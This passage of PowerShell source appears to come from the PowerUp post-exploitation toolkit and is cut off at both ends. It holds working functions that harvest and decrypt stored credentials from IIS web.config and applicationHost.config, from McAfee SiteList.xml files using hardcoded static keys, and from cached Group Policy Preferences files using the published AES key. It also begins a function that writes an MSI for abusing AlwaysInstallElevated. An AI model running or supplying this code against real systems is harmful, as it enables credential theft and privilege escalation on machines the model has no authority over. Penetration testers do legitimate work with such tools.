Test-Path $_ } | ForEach-Object {\n        $Out = New-Object PSObject\n        $Out | Add-Member Noteproperty 'UnattendPath' $_\n        $Out | Add-Member Aliasproperty Name UnattendPath\n        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UnattendedInstallFile')\n        $Out\n    }\n\n    $ErrorActionPreference = $OrigError\n}\n\n\nfunction Get-WebConfig {\n<#\n.SYNOPSIS\n\nThis script will recover cleartext and encrypted connection strings from all web.config\nfiles on the system. Also, it will decrypt them if needed.\n\nAuthor: Scott Sutherland, Antti Rantasaari  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nThis script will identify all of the web.config files on the system and recover the\nconnection strings used to support authentication to backend databases.  If needed, the\nscript will also decrypt the connection strings on the fly.  The output supports the\npipeline which can be used to convert all of the results into a pretty table by piping\nto format-table.\n\n.EXAMPLE\n\nReturn a list of cleartext and decrypted connect strings from web.config files.\n\nGet-WebConfig\n\nuser   : s1admin\npass   : s1password\ndbserv : 192.168.1.103\\server1\nvdir   : C:\\test2\npath   : C:\\test2\\web.config\nencr   : No\n\nuser   : s1user\npass   : s1password\ndbserv : 192.168.1.103\\server1\nvdir   : C:\\inetpub\\wwwroot\npath   : C:\\inetpub\\wwwroot\\web.config\nencr   : Yes\n\n.EXAMPLE\n\nReturn a list of clear text and decrypted connect strings from web.config files.\n\nGet-WebConfig | Format-Table -Autosize\n\nuser    pass       dbserv                vdir               path                          encr\n----    ----       ------                ----               ----                          ----\ns1admin s1password 192.168.1.101\\server1 C:\\App1            C:\\App1\\web.config            No\ns1user  s1password 192.168.1.101\\server1 C:\\inetpub\\wwwroot C:\\inetpub\\wwwroot\\web.config No\ns2user  s2password 192.168.1.102\\server2 C:\\App2            C:\\App2\\test\\web.config       No\ns2user  s2password 192.168.1.102\\server2 C:\\App2            C:\\App2\\web.config            Yes\ns3user  s3password 192.168.1.103\\server3 D:\\App3            D:\\App3\\web.config            No\n\n.OUTPUTS\n\nSystem.Boolean\n\nSystem.Data.DataTable\n\n.LINK\n\nhttps://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1\nhttp://www.netspi.com\nhttps://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx\nhttp://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe\nhttp://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx\n\n.NOTES\n\nBelow is an alterantive method for grabbing connection strings, but it doesn't support decryption.\nfor /f \"tokens=*\" %i in ('%systemroot%\\system32\\inetsrv\\appcmd.exe list sites /text:name') do %systemroot%\\system32\\inetsrv\\appcmd.exe list config \"%i\" -section:connectionstrings\n\nAuthor: Scott Sutherland - 2014, NetSPI\nAuthor: Antti Rantasaari - 2014, NetSPI\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]\n    [OutputType('System.Boolean')]\n    [OutputType('System.Data.DataTable')]\n    [CmdletBinding()]\n    Param()\n\n    $OrigError = $ErrorActionPreference\n    $ErrorActionPreference = 'SilentlyContinue'\n\n    # Check if appcmd.exe exists\n    if (Test-Path  (\"$Env:SystemRoot\\System32\\InetSRV\\appcmd.exe\")) {\n\n        # Create data table to house results\n        $DataTable = New-Object System.Data.DataTable\n\n        # Create and name columns in the data table\n        $Null = $DataTable.Columns.Add('user')\n        $Null = $DataTable.Columns.Add('pass')\n        $Null = $DataTable.Columns.Add('dbserv')\n        $Null = $DataTable.Columns.Add('vdir')\n        $Null = $DataTable.Columns.Add('path')\n        $Null = $DataTable.Columns.Add('encr')\n\n        # Get list of virtual directories in IIS\n        C:\\Windows\\System32\\InetSRV\\appcmd.exe list vdir /text:physicalpath |\n        ForEach-Object {\n\n            $CurrentVdir = $_\n\n            # Converts CMD style env vars (%) to powershell env vars (env)\n            if ($_ -like \"*%*\") {\n                $EnvarName = \"`$Env:\"+$_.split(\"%\")[1]\n                $EnvarValue = Invoke-Expression $EnvarName\n                $RestofPath = $_.split('%')[2]\n                $CurrentVdir  = $EnvarValue+$RestofPath\n            }\n\n            # Search for web.config files in each virtual directory\n            $CurrentVdir | Get-ChildItem -Recurse -Filter web.config | ForEach-Object {\n\n                # Set web.config path\n                $CurrentPath = $_.fullname\n\n                # Read the data from the web.config xml file\n                [xml]$ConfigFile = Get-Content $_.fullname\n\n                # Check if the connectionStrings are encrypted\n                if ($ConfigFile.configuration.connectionStrings.add) {\n\n                    # Foreach connection string add to data table\n                    $ConfigFile.configuration.connectionStrings.add|\n                    ForEach-Object {\n\n                        [String]$MyConString = $_.connectionString\n                        if ($MyConString -like '*password*') {\n                            $ConfUser = $MyConString.Split('=')[3].Split(';')[0]\n                            $ConfPass = $MyConString.Split('=')[4].Split(';')[0]\n                            $ConfServ = $MyConString.Split('=')[1].Split(';')[0]\n                            $ConfVdir = $CurrentVdir\n                            $ConfEnc = 'No'\n                            $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ, $ConfVdir, $CurrentPath, $ConfEnc)\n                        }\n                    }\n                }\n                else {\n\n                    # Find newest version of aspnet_regiis.exe to use (it works with older versions)\n                    $AspnetRegiisPath = Get-ChildItem -Path \"$Env:SystemRoot\\Microsoft.NET\\Framework\\\" -Recurse -filter 'aspnet_regiis.exe'  | Sort-Object -Descending | Select-Object fullname -First 1\n\n                    # Check if aspnet_regiis.exe exists\n                    if (Test-Path  ($AspnetRegiisPath.FullName)) {\n\n                        # Setup path for temp web.config to the current user's temp dir\n                        $WebConfigPath = (Get-Item $Env:temp).FullName + '\\web.config'\n\n                        # Remove existing temp web.config\n                        if (Test-Path  ($WebConfigPath)) {\n                            Remove-Item $WebConfigPath\n                        }\n\n                        # Copy web.config from vdir to user temp for decryption\n                        Copy-Item $CurrentPath $WebConfigPath\n\n                        # Decrypt web.config in user temp\n                        $AspnetRegiisCmd = $AspnetRegiisPath.fullname+' -pdf \"connectionStrings\" (get-item $Env:temp).FullName'\n                        $Null = Invoke-Expression $AspnetRegiisCmd\n\n                        # Read the data from the web.config in temp\n                        [xml]$TMPConfigFile = Get-Content $WebConfigPath\n\n                        # Check if the connectionStrings are still encrypted\n                        if ($TMPConfigFile.configuration.connectionStrings.add) {\n\n                            # Foreach connection string add to data table\n                            $TMPConfigFile.configuration.connectionStrings.add | ForEach-Object {\n\n                                [String]$MyConString = $_.connectionString\n                                if ($MyConString -like '*password*') {\n                                    $ConfUser = $MyConString.Split('=')[3].Split(';')[0]\n                                    $ConfPass = $MyConString.Split('=')[4].Split(';')[0]\n                                    $ConfServ = $MyConString.Split('=')[1].Split(';')[0]\n                                    $ConfVdir = $CurrentVdir\n                                    $ConfEnc = 'Yes'\n                                    $Null = $DataTable.Rows.Add($ConfUser, $ConfPass, $ConfServ, $ConfVdir, $CurrentPath, $ConfEnc)\n                                }\n                            }\n                        }\n                        else {\n                            Write-Verbose \"Decryption of $CurrentPath failed.\"\n                            $False\n                        }\n                    }\n                    else {\n                        Write-Verbose 'aspnet_regiis.exe does not exist in the default location.'\n                        $False\n                    }\n                }\n            }\n        }\n\n        # Check if any connection strings were found\n        if ( $DataTable.rows.Count -gt 0 ) {\n            # Display results in list view that can feed into the pipeline\n            $DataTable | Sort-Object user,pass,dbserv,vdir,path,encr | Select-Object user,pass,dbserv,vdir,path,encr -Unique\n        }\n        else {\n            Write-Verbose 'No connection strings found.'\n            $False\n        }\n    }\n    else {\n        Write-Verbose 'Appcmd.exe does not exist in the default location.'\n        $False\n    }\n    $ErrorActionPreference = $OrigError\n}\n\n\nfunction Get-ApplicationHost {\n<#\n.SYNOPSIS\n\nRecovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system.\n\nAuthor: Scott Sutherland  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nThis script will decrypt and recover application pool and virtual directory passwords\nfrom the applicationHost.config file on the system.  The output supports the\npipeline which can be used to convert all of the results into a pretty table by piping\nto format-table.\n\n.EXAMPLE\n\nReturn application pool and virtual directory passwords from the applicationHost.config on the system.\n\nGet-ApplicationHost\n\nuser    : PoolUser1\npass    : PoolParty1!\ntype    : Application Pool\nvdir    : NA\napppool : ApplicationPool1\nuser    : PoolUser2\npass    : PoolParty2!\ntype    : Application Pool\nvdir    : NA\napppool : ApplicationPool2\nuser    : VdirUser1\npass    : VdirPassword1!\ntype    : Virtual Directory\nvdir    : site1/vdir1/\napppool : NA\nuser    : VdirUser2\npass    : VdirPassword2!\ntype    : Virtual Directory\nvdir    : site2/\napppool : NA\n\n.EXAMPLE\n\nReturn a list of cleartext and decrypted connect strings from web.config files.\n\nGet-ApplicationHost | Format-Table -Autosize\n\nuser          pass               type              vdir         apppool\n----          ----               ----              ----         -------\nPoolUser1     PoolParty1!       Application Pool   NA           ApplicationPool1\nPoolUser2     PoolParty2!       Application Pool   NA           ApplicationPool2\nVdirUser1     VdirPassword1!    Virtual Directory  site1/vdir1/ NA\nVdirUser2     VdirPassword2!    Virtual Directory  site2/       NA\n\n.OUTPUTS\n\nSystem.Data.DataTable\n\nSystem.Boolean\n\n.LINK\n\nhttps://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1\nhttp://www.netspi.com\nhttp://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe\nhttp://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx\n\n.NOTES\n\nAuthor: Scott Sutherland - 2014, NetSPI\nVersion: Get-ApplicationHost v1.0\nComments: Should work on IIS 6 and Above\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]\n    [OutputType('System.Data.DataTable')]\n    [OutputType('System.Boolean')]\n    [CmdletBinding()]\n    Param()\n\n    $OrigError = $ErrorActionPreference\n    $ErrorActionPreference = 'SilentlyContinue'\n\n    # Check if appcmd.exe exists\n    if (Test-Path  (\"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe\")) {\n        # Create data table to house results\n        $DataTable = New-Object System.Data.DataTable\n\n        # Create and name columns in the data table\n        $Null = $DataTable.Columns.Add('user')\n        $Null = $DataTable.Columns.Add('pass')\n        $Null = $DataTable.Columns.Add('type')\n        $Null = $DataTable.Columns.Add('vdir')\n        $Null = $DataTable.Columns.Add('apppool')\n\n        # Get list of application pools\n        Invoke-Expression \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppools /text:name\" | ForEach-Object {\n\n            # Get application pool name\n            $PoolName = $_\n\n            # Get username\n            $PoolUserCmd = \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppool \" + \"`\"$PoolName`\" /text:processmodel.username\"\n            $PoolUser = Invoke-Expression $PoolUserCmd\n\n            # Get password\n            $PoolPasswordCmd = \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppool \" + \"`\"$PoolName`\" /text:processmodel.password\"\n            $PoolPassword = Invoke-Expression $PoolPasswordCmd\n\n            # Check if credentials exists\n            if (($PoolPassword -ne \"\") -and ($PoolPassword -isnot [system.array])) {\n                # Add credentials to database\n                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)\n            }\n        }\n\n        # Get list of virtual directories\n        Invoke-Expression \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir /text:vdir.name\" | ForEach-Object {\n\n            # Get Virtual Directory Name\n            $VdirName = $_\n\n            # Get username\n            $VdirUserCmd = \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir \" + \"`\"$VdirName`\" /text:userName\"\n            $VdirUser = Invoke-Expression $VdirUserCmd\n\n            # Get password\n            $VdirPasswordCmd = \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir \" + \"`\"$VdirName`\" /text:password\"\n            $VdirPassword = Invoke-Expression $VdirPasswordCmd\n\n            # Check if credentials exists\n            if (($VdirPassword -ne \"\") -and ($VdirPassword -isnot [system.array])) {\n                # Add credentials to database\n                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')\n            }\n        }\n\n        # Check if any passwords were found\n        if ( $DataTable.rows.Count -gt 0 ) {\n            # Display results in list view that can feed into the pipeline\n            $DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique\n        }\n        else {\n            # Status user\n            Write-Verbose 'No application pool or virtual directory passwords were found.'\n            $False\n        }\n    }\n    else {\n        Write-Verbose 'Appcmd.exe does not exist in the default location.'\n        $False\n    }\n    $ErrorActionPreference = $OrigError\n}\n\n\nfunction Get-SiteListPassword {\n<#\n.SYNOPSIS\n\nRetrieves the plaintext passwords for found McAfee's SiteList.xml files.\nBased on Jerome Nokin (@funoverip)'s Python solution (in links).\n\nAuthor: Jerome Nokin (@funoverip)  \nPowerShell Port: @harmj0y  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nSearches for any McAfee SiteList.xml in C:\\Program Files\\, C:\\Program Files (x86)\\,\nC:\\Documents and Settings\\, or C:\\Users\\. For any files found, the appropriate\ncredential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword\nfunction that takes advantage of McAfee's static key encryption. Any decrypted credentials\nare output in custom objects. See links for more information.\n\n.PARAMETER Path\n\nOptional path to a SiteList.xml file or folder.\n\n.EXAMPLE\n\nGet-SiteListPassword\n\nEncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==\nUserName    :\nPath        : Products/CommonUpdater\nName        : McAfeeHttp\nDecPassword : MyStrongPassword!\nEnabled     : 1\nDomainName  :\nServer      : update.nai.com:80\n\nEncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==\nUserName    : McAfeeService\nPath        : Repository$\nName        : Paris\nDecPassword : MyStrongPassword!\nEnabled     : 1\nDomainName  : companydomain\nServer      : paris001\n\nEncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==\nUserName    : McAfeeService\nPath        : Repository$\nName        : Tokyo\nDecPassword : MyStrongPassword!\nEnabled     : 1\nDomainName  : companydomain\nServer      : tokyo000\n\n.OUTPUTS\n\nPowerUp.SiteListPassword\n\n.LINK\n\nhttps://github.com/funoverip/mcafee-sitelist-pwd-decryption/\nhttps://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/\nhttps://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md\nhttps://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.SiteListPassword')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [ValidateScript({Test-Path -Path $_ })]\n        [String[]]\n        $Path\n    )\n\n    BEGIN {\n        function Local:Get-DecryptedSitelistPassword {\n            # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/\n            # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)\n            # port by @harmj0y\n            [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n            [CmdletBinding()]\n            Param(\n                [Parameter(Mandatory = $True)]\n                [String]\n                $B64Pass\n            )\n\n            # make sure the appropriate assemblies are loaded\n            Add-Type -Assembly System.Security\n            Add-Type -Assembly System.Core\n\n            # declare the encoding/crypto providers we need\n            $Encoding = [System.Text.Encoding]::ASCII\n            $SHA1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider\n            $3DES = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider\n\n            # static McAfee key XOR key LOL\n            $XORKey = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19\n\n            # xor the input b64 string with the static XOR key\n            $I = 0;\n            $UnXored = [System.Convert]::FromBase64String($B64Pass) | Foreach-Object { $_ -BXor $XORKey[$I++ % $XORKey.Length] }\n\n            # build the static McAfee 3DES key TROLOL\n            $3DESKey = $SHA1.ComputeHash($Encoding.GetBytes('<!@#$%^>')) + ,0x00*4\n\n            # set the options we need\n            $3DES.Mode = 'ECB'\n            $3DES.Padding = 'None'\n            $3DES.Key = $3DESKey\n\n            # decrypt the unXor'ed block\n            $Decrypted = $3DES.CreateDecryptor().TransformFinalBlock($UnXored, 0, $UnXored.Length)\n\n            # ignore the padding for the result\n            $Index = [Array]::IndexOf($Decrypted, [Byte]0)\n            if ($Index -ne -1) {\n                $DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)])\n            }\n            else {\n                $DecryptedPass = $Encoding.GetString($Decrypted)\n            }\n\n            New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass}\n        }\n\n        function Local:Get-SitelistField {\n            [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n            [CmdletBinding()]\n            Param(\n                [Parameter(Mandatory = $True)]\n                [String]\n                $Path\n            )\n\n            try {\n                [Xml]$SiteListXml = Get-Content -Path $Path\n\n                if ($SiteListXml.InnerXml -Like \"*password*\") {\n                    Write-Verbose \"Potential password in found in $Path\"\n\n                    $SiteListXml.SiteLists.SiteList.ChildNodes | Foreach-Object {\n                        try {\n                            $PasswordRaw = $_.Password.'#Text'\n\n                            if ($_.Password.Encrypted -eq 1) {\n                                # decrypt the base64 password if it's marked as encrypted\n                                $DecPassword = if ($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''}\n                            }\n                            else {\n                                $DecPassword = $PasswordRaw\n                            }\n\n                            $Server = if ($_.ServerIP) { $_.ServerIP } else { $_.Server }\n                            $Path = if ($_.ShareName) { $_.ShareName } else { $_.RelativePath }\n\n                            $ObjectProperties = @{\n                                'Name' = $_.Name;\n                                'Enabled' = $_.Enabled;\n                                'Server' = $Server;\n                                'Path' = $Path;\n                                'DomainName' = $_.DomainName;\n                                'UserName' = $_.UserName;\n                                'EncPassword' = $PasswordRaw;\n                                'DecPassword' = $DecPassword;\n                            }\n                            $Out = New-Object -TypeName PSObject -Property $ObjectProperties\n                            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.SiteListPassword')\n                            $Out\n                        }\n                        catch {\n                            Write-Verbose \"Error parsing node : $_\"\n                        }\n                    }\n                }\n            }\n            catch {\n                Write-Warning \"Error parsing file '$Path' : $_\"\n            }\n        }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Path']) {\n            $XmlFilePaths = $Path\n        }\n        else {\n            $XmlFilePaths = @('C:\\Program Files\\','C:\\Program Files (x86)\\','C:\\Documents and Settings\\','C:\\Users\\')\n        }\n\n        $XmlFilePaths | Foreach-Object { Get-ChildItem -Path $_ -Recurse -Include 'SiteList.xml' -ErrorAction SilentlyContinue } | Where-Object { $_ } | Foreach-Object {\n            Write-Verbose \"Parsing SiteList.xml file '$($_.Fullname)'\"\n            Get-SitelistField -Path $_.Fullname\n        }\n    }\n}\n\n\nfunction Get-CachedGPPPassword {\n<#\n.SYNOPSIS\n\nRetrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and\nleft in cached files on the host.\n\nAuthor: Chris Campbell (@obscuresec)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nGet-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and\ndatasources.xml files and returns plaintext passwords.\n\n.EXAMPLE\n\nGet-CachedGPPPassword\n\nNewName   : [BLANK]\nChanged   : {2013-04-25 18:36:07}\nPasswords : {Super!!!Password}\nUserNames : {SuperSecretBackdoor}\nFile      : C:\\ProgramData\\Microsoft\\Group Policy\\History\\{32C4C89F-7\n            C3A-4227-A61D-8EF72B5B9E42}\\Machine\\Preferences\\Groups\\Gr\n            oups.xml\n\n.LINK\n\nhttp://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html\nhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb\nhttp://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences\nhttp://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html\n#>\n\n    [CmdletBinding()]\n    Param()\n\n    # Some XML issues between versions\n    Set-StrictMode -Version 2\n\n    # make sure the appropriate assemblies are loaded\n    Add-Type -Assembly System.Security\n    Add-Type -Assembly System.Core\n\n    # helper that decodes and decrypts password\n    function local:Get-DecryptedCpassword {\n        [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n        [CmdletBinding()]\n        Param(\n            [string] $Cpassword\n        )\n\n        try {\n            # Append appropriate padding based on string length\n            $Mod = ($Cpassword.length % 4)\n\n            switch ($Mod) {\n                '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}\n                '2' {$Cpassword += ('=' * (4 - $Mod))}\n                '3' {$Cpassword += ('=' * (4 - $Mod))}\n            }\n\n            $Base64Decoded = [Convert]::FromBase64String($Cpassword)\n\n            # Create a new AES .NET Crypto Object\n            $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider\n            [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,\n                                 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)\n\n            # Set IV to all nulls to prevent dynamic generation of IV value\n            $AesIV = New-Object Byte[]($AesObject.IV.Length)\n            $AesObject.IV = $AesIV\n            $AesObject.Key = $AesKey\n            $DecryptorObject = $AesObject.CreateDecryptor()\n            [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)\n\n            return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)\n        }\n\n        catch {\n            Write-Error $Error[0]\n        }\n    }\n\n    # helper that parses fields from the found xml preference files\n    function local:Get-GPPInnerField {\n        [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n        [CmdletBinding()]\n        Param(\n            $File\n        )\n\n        try {\n            $Filename = Split-Path $File -Leaf\n            [XML] $Xml = Get-Content ($File)\n\n            $Cpassword = @()\n            $UserName = @()\n            $NewName = @()\n            $Changed = @()\n            $Password = @()\n\n            # check for password field\n            if ($Xml.innerxml -like \"*cpassword*\"){\n\n                Write-Verbose \"Potential password in $File\"\n\n                switch ($Filename) {\n                    'Groups.xml' {\n                        $Cpassword += , $Xml | Select-Xml \"/Groups/User/Properties/@cpassword\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $UserName += , $Xml | Select-Xml \"/Groups/User/Properties/@userName\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $NewName += , $Xml | Select-Xml \"/Groups/User/Properties/@newName\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $Changed += , $Xml | Select-Xml \"/Groups/User/@changed\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                    }\n\n                    'Services.xml' {\n                        $Cpassword += , $Xml | Select-Xml \"/NTServices/NTService/Properties/@cpassword\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $UserName += , $Xml | Select-Xml \"/NTServices/NTService/Properties/@accountName\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $Changed += , $Xml | Select-Xml \"/NTServices/NTService/@changed\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                    }\n\n                    'Scheduledtasks.xml' {\n                        $Cpassword += , $Xml | Select-Xml \"/ScheduledTasks/Task/Properties/@cpassword\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $UserName += , $Xml | Select-Xml \"/ScheduledTasks/Task/Properties/@runAs\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $Changed += , $Xml | Select-Xml \"/ScheduledTasks/Task/@changed\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                    }\n\n                    'DataSources.xml' {\n                        $Cpassword += , $Xml | Select-Xml \"/DataSources/DataSource/Properties/@cpassword\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $UserName += , $Xml | Select-Xml \"/DataSources/DataSource/Properties/@username\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $Changed += , $Xml | Select-Xml \"/DataSources/DataSource/@changed\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                    }\n\n                    'Printers.xml' {\n                        $Cpassword += , $Xml | Select-Xml \"/Printers/SharedPrinter/Properties/@cpassword\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $UserName += , $Xml | Select-Xml \"/Printers/SharedPrinter/Properties/@username\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $Changed += , $Xml | Select-Xml \"/Printers/SharedPrinter/@changed\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                    }\n\n                    'Drives.xml' {\n                        $Cpassword += , $Xml | Select-Xml \"/Drives/Drive/Properties/@cpassword\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $UserName += , $Xml | Select-Xml \"/Drives/Drive/Properties/@username\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                        $Changed += , $Xml | Select-Xml \"/Drives/Drive/@changed\" | Select-Object -Expand Node | ForEach-Object {$_.Value}\n                    }\n                }\n           }\n\n           ForEach ($Pass in $Cpassword) {\n               Write-Verbose \"Decrypting $Pass\"\n               $DecryptedPassword = Get-DecryptedCpassword $Pass\n               Write-Verbose \"Decrypted a password of $DecryptedPassword\"\n               #append any new passwords to array\n               $Password += , $DecryptedPassword\n           }\n\n            # put [BLANK] in variables\n            if (-not $Password) {$Password = '[BLANK]'}\n            if (-not $UserName) {$UserName = '[BLANK]'}\n            if (-not $Changed)  {$Changed = '[BLANK]'}\n            if (-not $NewName)  {$NewName = '[BLANK]'}\n\n            # Create custom object to output results\n            $ObjectProperties = @{'Passwords' = $Password;\n                                  'UserNames' = $UserName;\n                                  'Changed' = $Changed;\n                                  'NewName' = $NewName;\n                                  'File' = $File}\n\n            $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties\n            Write-Verbose \"The password is between {} and may be more than one value.\"\n            if ($ResultsObject) { Return $ResultsObject }\n        }\n\n        catch {Write-Error $Error[0]}\n    }\n\n    try {\n        $AllUsers = $Env:ALLUSERSPROFILE\n\n        if ($AllUsers -notmatch 'ProgramData') {\n            $AllUsers = \"$AllUsers\\Application Data\"\n        }\n\n        # discover any locally cached GPP .xml files\n        $XMlFiles = Get-ChildItem -Path $AllUsers -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml' -Force -ErrorAction SilentlyContinue\n\n        if ( -not $XMlFiles ) {\n            Write-Verbose 'No preference files found.'\n        }\n        else {\n            Write-Verbose \"Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords.\"\n\n            ForEach ($File in $XMLFiles) {\n                Get-GppInnerField $File.Fullname\n            }\n        }\n    }\n\n    catch {\n        Write-Error $Error[0]\n    }\n}\n\n\nfunction Write-UserAddMSI {\n<#\n.SYNOPSIS\n\nWrites out a precompiled MSI installer that prompts for a user/group addition.\nThis function can be used to abuse Get-RegistryAlwaysInstallElevated.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nWrites out a precompiled MSI installer that prompts for a user/group addition.\nThis function can be used to abuse Get-RegistryAlwaysInstallElevated.\n\n.EXAMPLE\n\nWrite-UserAddMSI\n\nWrites the user add MSI to the local directory.\n\n.OUTPUTS\n\nPowerUp.UserAddMSI\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('ServiceProcess.UserAddMSI')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Path = 'UserAdd.msi'\n    )\n\n    $Binary = 